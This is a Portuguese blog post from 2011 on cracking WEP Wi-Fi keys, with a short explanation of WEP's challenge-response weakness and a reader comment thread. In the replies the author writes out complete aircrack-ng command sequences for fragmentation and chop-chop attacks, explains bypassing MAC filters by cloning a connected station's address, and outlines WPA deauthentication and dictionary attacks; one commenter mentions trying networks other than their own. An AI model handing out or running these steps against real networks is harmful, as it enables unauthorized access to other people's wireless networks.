Quebrando Chaves WEP

Publicado: 17 de março de 2011 em Wireless - Dark Side
Tags:, ,

Boa noite pessoal,

Antes de mais nada, gostaria de enfatizar que o meu objetivo com este tutorial não é passar um step-by-step de como quebrar chaves WEP e sim mostrar que essa seguraça é frágil e pode ser facilmente quebrada.

Um pouco de teoria antes da diversão:

WEP significa Wired Equivalent Privacy e foi um dos primeiros métodos utilizados visando dar segurança às redes Wireless.

Um overview do funcionamento da autenticação utilizando uma Pre Shared Key WEP:

Utilizando WEP você não autentica os usuários, ou seja, você não sabe exatamente quem eles são, você apenas verifica que tais usuários sabem qual é a chave utilizada.

O processo de autenticação WEP é como segue:

  1. O usuário wireless envia um Authentication Request
  2. o Access Point envia um Authentication Response contendo o challenge text. O challenge text é não é encriptado antes de ser enviado (é enviado em clear-text).
  3. O usuário wireless usa o texto recebido para responder com um pacote encriptado. A encriptação do pacote é feita utilizando a chave WEP que o usuário já conhece.
  4. O Access Point compara a resposta que ele recebeu com a sua própria cópia de como a resposta deveria ser. Se for igual, então o cliente é associado.

O processo é exibido na figura abaixo:

Autenticação WEP

O ataque é simples, pois é possível capturar o challenge text, que não é encriptado, e a resposta, que é encriptada. Dessa forma é possivel derivar qual a chave WEP utilizada para realizar tal encriptação.

Já sabendo a teoria, vamos para prática com esta video aula utilizando o software Backtrack:

link do video: http://www.youtube.com/watch?v=wYxqcl9O-mo

Espero que vocês gostem deste post e que ele seja útil a vocês.

Até mais,

Bartulihe

Anúncios
comentários
  1. Anderson Santana disse:

    Bom dia amigo, gosto de seus videos!!! Olha só, preciso de uma ajuda…qd estou no backtrack e executo o comando “aireplay-ng -5 -b (bssid) mon0” não aparece a mensagem de associação com sucesso(oq é o correto), vc já teve algum caso assim?como resolver isso???
    Abrass, add vc no msn aceita lá!!!SUCESSO!!!

    • wirelesscert disse:

      Bom dia Anderson,

      Muito obrigado. Fico feliz em saber que você gosta dos meus vídeos.
      O comando aireplay-ng, seguido da opção -5 é utilizado para realizar o Fragmentation Attack. A idéia básica do Fragmentation Attack é coletar fragmentos de pacotes e “montar” um ARP utilizando o arpforge-ng ou packetforge-ng. Em seguinda realizamos o packet injection para obter ARP responses e incrementar o número de IVs.

      Para realizar o Fragmentation Attack, inicialmente precisamos colocar a placa wireless no modo monitor:
      airmon-ng start [device]
      Exemplo: airmon-ng start wlan0

      Para “ouvir” todas as redes Wireless próximas:
      airodump-ng [device]
      Exemplo: airodump-ng mon0

      Em seguida, precisamos realizar o fake authentication com o Access Point:
      aireplay-ng -1 0 -a [bssid] -e [essid] [device]
      Exemplo: aireplay-ng -1 0 -a 00:11:22:33:44:55 -e WiFiWirelessCert mon0

      Agora sim iniciamos o Fragmentation Attack:
      aireplay-ng -5 -b [bssid] [device]
      Exemplo: aireplay-ng -5 -b 00:11:22:33:44:55 mon0

      O passo seguinte é utilizar o PacketForge:
      packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file]

      Exemplo: packetforge-ng -0 -a 00:11:22:33:44:55 -h 66:77:88:99:11:22 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1234-1234567.xor] -w arp-request

      Precisamos agora utilizar o airodump para realizar o sniffer enquanto o packet injection é feito:
      airodump-ng -c [channel] -w [file] -b [bssid] [device]
      Exemplo: airodump-ng -c 6 -w WirelessCertCapture -b 00:11:22:33:44:55 mon0

      Iniciar o packet injection:
      aireplay-ng -2 -r [file] [device]
      Exemplo: aireplay-ng -2 -r arp-request mon0

      Por fim, Aircrack:
      aircrack-ng -b [bssid] [file].cap
      Exemplo: aircrack-ng -b 00:11:22:33:44:55 WirelessCertCapture.cap

      Este ataque é bastante parecido com o Chop Chop Attack. A sintaxe básica de comando para executar o Chop Chop Attack é:

      airmon-ng start [device]
      airodump-ng [device]
      airodump-ng -c [channel] -w [file] -b [bssid] [device]
      aireplay-ng -1 0 -a [bssid] -e [essid] [device]
      aireplay-ng -5 -b [bssid] [device]
      “Saving keystream in fragment-xxxx-xxxxxx.xor”
      packetforge-ng -0 -a [bssid] -h [mac] -k 255.255.255.255 -l 255.255.255.255 -y [fragment-xxxx-xxxxxx.xor] -w [file02]
      aireplay-ng -2 -r [file02] [device]
      aircrack-ng -b [bssid] [file].cap

      Abraços,

      Marco Bartulihe

  2. pedro disse:

    ola. gostei do video, um dos mais bem explicados que ja encontrei na net. porem me tire uma duvida. nao consigo me autenticar na rede. ela aparece como vc mostrou, sem data, porem eles vao subindo um a um bem devagar. mas mesmo assim qdo tento realizar a autenticacao ele nao autentica. o que ocorre? seria mesmo uma rede sem ngm utilizando ou algo esta errado? desde ja grato.

    • wirelesscert disse:

      Boa noite amigo,
      Pelo que entendi você não está tendo sucesso no fake authentication, ou seja, com o comando:
      aireplay-ng -1 0 -a [bssid] -e [essid] [device]
      Correto?
      Caso positivo, a causa mais provável é que esteja aplicado um filtro por MAC Address no AP. É fácil burlar filtros por MAC, pois você pode alterar o endereço MAC facilmente no Backtrack. Basta capturar o MAC de uma estação conectada ao AP em questão (você faz isso naquela tela do airodump-ng, onde mostra o BSSID, STATION, etc) e alterar o seu MAC para o endereço capturado, com o comando:
      macchanger –mac xx:xx:xx:xx:xx:xx [device]
      Onde xx:xx:xx:xx:xx:xx é o endereço MAC da estação conectada ao AP que você está atacando.

      Para alterar o MAC, a interface precisa estar em shutdown, portanto será necessário pará-la:
      ifconfig down [interface]
      E ai sim alterar o MAC.

      Abraços,

      Marco Bartulihe

  3. pedro disse:

    ola de novo. bom talvez seja isso. esta tentativa nao tentei ainda. soh havia feito a mudanca basica do 00:11:22:33:44:55. ja cheguei a conseguir me autenticar nessa estacao, porem mesmo assim sem sussesso na hora de conseguir o handshake. nao sei o q ocorre. estou tentando utilizar as tecnicas na minha propria rede, que na verdade soh tem 1 usuario wireless, o outro pc é conectado via cabo no roteador. entao quando tento invadir, nao ha usuario pois utilizo o notebook para isso. entao nao sei o que acontece. quando coloco wep consigo quebrar a chave, mas no caso usando agora wpa/psk nao consigo o handshake. hj estava tentando novamente com wpa e por curiosidade clikei para conectar pelo wicd enquanto estava usando o airodump na minha rede. dai diante disto consegui sem qrer o handshake acidental, mas gostaria de conseguir sem ter q fazer isso, pois neste caso nem eh kebra.
    se puder me ajudar em outra duvida tambem agradeco. gostaria de saber como fazer para que na hora do aircrack-ng fazer com que as chaves sejam testadas mais rapidamente, pois o dicionario que possuo é bastante grande e com isso demoraria mto para kebrar por exemplo uma chave que fosse tipo zuzuzu, pois pelo que percebi ele vai testando desde a a zero. vi em um video onde a pessoa utilizza algo chamado data porem nao tenho isso.
    desde ja grato

    • wirelesscert disse:

      Olá Pedro,

      Pelo que entendi agora você está tentando quebrar uma chave WPA e não WEP, correto?
      Portanto, o processo é um pouco diferente. Os ataques mais comuns contra chaves WPA/WPA2 utilizam são os chamados Dictionary Attacks, ou seja, você tem uma base de senhas e utiliza tais senhas para fazer um brute force… tentativa e erro.
      Para quebrar uma WPA/WPAs, primeiramente você precisa passar pelo chamado 4-Way Handshake. Veja a imagem abaixo:

      Isso é simples, mas você precisa de alguém conectado, pois você ficará monitorando com o airodump e fará um broadcast (ou unicast) deauthentication.
      O usuário conectado vai perder a conexão e se reconectar logo em seguida. É nessa etapa que o airodump coleta é o 4-Way Handshake.
      Em seguida você faz o dictionary attack e, realmente, esse processo pode ser bem lento, pois são testadas, em media, 500 chaves por segundo. Dependendo do tamanho do seu dicionário, isso pode levar até anos. O que é feito para diminuir esse tempo é baixar algumas listas com as senhas mais comuns. Existem listas bem grandes, de 30 GB, mas a senha tem que estar nessa lista, caso não esteja, o ataque será em vão.
      Dá uma olhada no link abaixo:
      http://lastbit.com/pswcalc.asp
      Esse é um algoritmo que calcula quanto tempo você levara para quebrar uma senha, via brute force. Deixa o speed em 500 que é um valor adequado.
      Abraços,

      Marco Bartulihe

  4. pedro disse:

    oola. bom era isso mesmo. eh consegui quebrar a chave wep, ate que foi bem facil, agora mudei a chave do meu roteador para wpa psk e estou tentando, porem esta dificil sem ter ninguem na rede, ja que o desktop conecta via cabo e o note apenas que usa wireless, mas estou testando alguns programas. tentarei tambem aprender bem com wep, pois apenas quebrei a minha rede, mesmo sem cliente conectado. porem quando tento quebrar outras que aparecem sem clientes ja fica mais dificil e ainda nao consegui. tbm estou tentando descobrir hidden ssid. mas estou indo bem. estou utilizando o linux wifiway/ wifislax agora. parece ser mais pratico ja que os programas trabalham automaticos rs. d
    desde ja grato, pois seu post foi mto bem elaborado e graças a ele consegui entender um pouco mais dessa parte.

  5. Sandro disse:

    Olá Marco, gostei muito do vídeo, muito bem feito, claro, simples e bem explicativo.
    Você tem algum video que demonstre a quebra de chaves wpa2? Vi que tem um comentario seu logo acima, mas confesso que não entendi muito coisa..heheh

    Desde já agradeço.

  6. Junior disse:

    Boa tarde, estou com um problema no back track, ele nao reconhece minha placa wifi. Estou usando o vmwere, tem alguma ideia/

  7. mauro disse:

    Boa tarde amigo gostaria que vc me ajudasse com uma duvida. Estou no penultimo comando ja aguardei ate 1 dia buscando packets ja busquei 50000 ivs mas nao consegue quebrar quando entro no aircrack-ng *.cap sempre pede mais ivs o que eu faco meu ba k track e o 4. grato desde ja.

  8. Samuel disse:

    Boa noite amigo. Fiz um teste tentando quebrar a chave WEP aqui da rede de casa. Consegui quebrar a chave, porém não consigo conectar na rede wireless. Eu instalei o backtrack para dual boot. Tenho um notebook Emachines E627 e no site do BK para verificar a compatibilidade “Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev 01)”. Poderia me ajudar ? Obrigado.

    Obs: Descobri agora o blog, show de bola!! Parabens.

    • Olá Samuel, bom dia!
      Geralmente quando você tenta se conectar a uma rede Wireless com chave WEP, mas não consegue, é porque a chave WEP está incorreta.
      Como você está fazendo testes com seu próprio roteador Wireless, você sabe a senha que você colocou, correto?
      A senha que você obteve com o Backtrack está igual a que você inseriu?

      Abraços,
      Marco Bartulihe

      • Samuel disse:

        Boa noite Marco.
        Eu tentei conectar na rede wireless de casa com a chave correta. Já procurei por códigos que poderiam me fazer conectar na rede, porém ainda não estou conseguindo. Você teria algum comando para me fazer conectar a rede wireless ?! Já instalei o driver da placa wireless e mesmo assim não consigo.
        Obrigado,
        Samuel.

  9. Douglas disse:

    sou novo aqui,gostei muito do seu blogger,mas minha duvida é a seguinte: uso o backtrack 5 kde,ja quebrei algumas chaves wep com ele mas quando vou capturar os pacote em “data” nao muda rapidamente como deveria,nao aparece em modo handshake entende? consigo me autentificar e tudo mas nao consigo acelerar os arp e os acs.porque isso,sera que ta faltando algum arquivo no backtrack ?entra em modo monitor,consigo me autentificar mas nao entendo o que esta acontecendo.Das outras vezes que eu quebrei chaves foi porque havia mas pessoas conctadas a vitima senao nao teria.Agradeceria muito se me tirasse essa duvida,como colocar pra aparecer “handshke”?

  10. Patrick disse:

    Marco, queria parabeniza-lo pelas explicações e ta servindo de muita ajuda. Sobre chaves WEP esta certinho pra mim, mas com chaves WPA-PSK tem uma coisa que preciso entender. Não consigo nenhum handshake, ja tentei muita coisa, inclusive ao invés de usar o aireplay-ng em broadcast, fixar somente em uma das stations conectadas e deixar sobrecarregando minha rede pra ver se consigo.
    usei #aireplay-ng -0 0 -a AP -c STATION mon0
    mas nada… só quero entender como é adquirido um handshake.
    com o airodump-ng rodando, só preciso mandar um aireplay-ng -0 5 -a AP mon0 e esperar?

    • Olá Patrick, tudo bem?
      Em primeiro lugar, muito obrigado pelos parabéns!!!

      Quanto a duvida do handshake, aguarde só mais uns dias, minha nova placa WiFi está a caminho… quando ela chegar, irei postar um vídeo justamente sobre isso. Mostrando como é simples fazer um dictionary attack, inclusive, criando o próprio dicionário.

      Abraços,
      Marco Bartulihe

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s